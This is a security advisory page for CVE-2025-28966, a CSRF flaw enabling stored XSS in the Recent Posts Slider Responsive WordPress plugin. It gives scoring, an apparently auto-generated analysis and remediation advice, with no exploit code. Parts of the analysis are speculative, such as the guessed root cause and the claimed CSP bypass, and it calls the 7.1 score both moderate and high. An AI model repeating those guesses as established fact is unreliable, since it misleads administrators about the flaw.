CVE-2025-28966

| EUVD-2025-17172 HIGH
2025-06-06 [email protected]
7.1
CVSS 3.1
Share

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

Lifecycle Timeline

3
Analysis Generated
Mar 14, 2026 - 18:10 vuln.today
EUVD ID Assigned
Mar 14, 2026 - 18:10 euvd
EUVD-2025-17172
CVE Published
Jun 06, 2025 - 13:15 nvd
HIGH 7.1

Tags

CSRF XSS WordPress PHP

Description

Cross-Site Request Forgery (CSRF) vulnerability in dilemma123 Recent Posts Slider Responsive allows Stored XSS. This issue affects Recent Posts Slider Responsive: from n/a through 1.0.1.

Analysis

Cross-Site Request Forgery (CSRF) vulnerability in the dilemma123 Recent Posts Slider Responsive WordPress plugin (versions through 1.0.1) that enables Stored XSS attacks. An unauthenticated attacker can craft malicious requests to inject persistent JavaScript payloads, which execute in the browsers of site administrators and visitors, potentially leading to account compromise, malware distribution, or defacement. The vulnerability requires user interaction (UI:R) but has network-accessible attack surface (AV:N) with moderate CVSS score of 7.1 and should be prioritized for patched WordPress installations running vulnerable plugin versions.

Technical Context

The Recent Posts Slider Responsive plugin for WordPress (CPE: wp:dilemma123:recent-posts-slider-responsive) contains a CSRF vulnerability (CWE-352: Cross-Site Request Forgery) combined with insufficient input validation, allowing Stored XSS (CWE-79 derivative). The root cause stems from the plugin accepting and storing user-supplied data without proper CSRF token validation and output encoding. WordPress plugins are executed server-side with access to the wp_options and custom post metadata tables; when a CSRF attack bypasses nonce verification, attacker-controlled content becomes stored in the database. Upon rendering, the Stored XSS payload executes client-side in administrator dashboards or frontend pages, bypassing typical Content Security Policy protections that assume server-side origin trust. The slider functionality likely iterates over post metadata without sanitization before echoing to the DOM.

Affected Products

Recent Posts Slider Responsive (1.0.1 and all prior versions)

Remediation

Primary: Deactivate and uninstall the Recent Posts Slider Responsive plugin immediately if no patched version is available from the vendor.; priority: CRITICAL Secondary: Replace with an actively maintained slider plugin (e.g., Elementor, Slider Revolution, or native WordPress block-based alternatives). Audit plugin source code history on WordPress.org plugin repository for abandoned status.; priority: HIGH Mitigation (if removal not immediately possible): Implement Web Application Firewall (WAF) rules to block POST requests to the plugin's slider configuration endpoints lacking valid WordPress nonces; restrict plugin functionality to authenticated admin users only via .htaccess or security plugin rules.; priority: MEDIUM Detection: Audit wp_postmeta and wp_options tables for suspicious entries added during plugin operation; search for encoded JavaScript or iframe tags in slider configuration fields.; priority: HIGH Future Prevention: Enforce WordPress security best practices: use security plugins (Wordfence, Sucuri) with vulnerability scanning; monitor plugin update status; use Web Application Firewall with OWASP CRS.; priority: ONGOING

Priority Score

36
Low Medium High Critical
KEV: 0
EPSS: +0.0
CVSS: +36
POC: 0

Share

CVE-2025-28966 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy